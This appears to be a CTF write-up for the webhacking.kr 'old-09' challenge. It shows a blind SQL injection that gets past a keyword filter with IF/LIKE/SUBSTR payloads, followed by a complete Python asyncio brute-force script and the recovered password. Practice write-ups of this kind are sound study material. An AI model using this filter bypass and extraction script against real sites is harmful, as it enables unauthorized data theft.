old-09 -- SQLi (No Logical Operators)
URL: https://webhacking.kr/challenge/web-09/
1 shows Apple
2 shows Banana
3 shows:
Secret
column : id,no
no 3's id is passwordPagination is done by get request: https://webhacking.kr/challenge/web-09/?no=3
AND, OR, &&, ||, SUBSTRING, SELECT, FROM, UNION, =, <, >, / and many others are blocked...
Finally I managed to make SQLi work via IF((1)LIKE(1),3,1)
[https://webhacking.kr/challenge/web-09/index.php?no=IF((1)LIKE(1),3,1)](https://webhacking.kr/challenge/web-09/index.php?no=IF((1)LIKE(1),3,1)
Probably some black magic involved here, but on successful IF we got 3rd id field and were able to brute force that way, second thing is that in False statement 1 didn't work? Changing to 0 made bruteforce successful.
import string
import asyncio
from aiohttp import ClientSession
URL = 'https://webhacking.kr/challenge/web-09/index.php'
COOKIES = {'PHPSESSID': 'hi4uvai5sde90encr0ktq6879f'}
CHARSET = string.ascii_letters + string.digits + '{}!?,/'
PAYLOAD = 'IF(SUBSTR(id,{},1)LIKE({}),3,0)'
SUCCESS = 'Secret'
async def fetch(session, index, char):
params = {'no': PAYLOAD.format(index, hex(ord(char)))}
async with session.get(URL, params=params) as resp:
if SUCCESS in await resp.text():
return char
return None
async def main():
password = 'alsrkswhaql'
async with ClientSession() as session:
session.cookie_jar.update_cookies(COOKIES)
while True:
password_i = len(password) + 1
print(f'\r[{password_i}] {password}', end='')
tasks = [fetch(session, password_i, char) for char in CHARSET]
results = await asyncio.gather(*tasks)
for result in results:
if result:
password += result
break
else:
break
print(f'\r[{password_i}] {password}')
if __name__ == '__main__':
asyncio.run(main())
# [12] alsrkswhaqlLast updated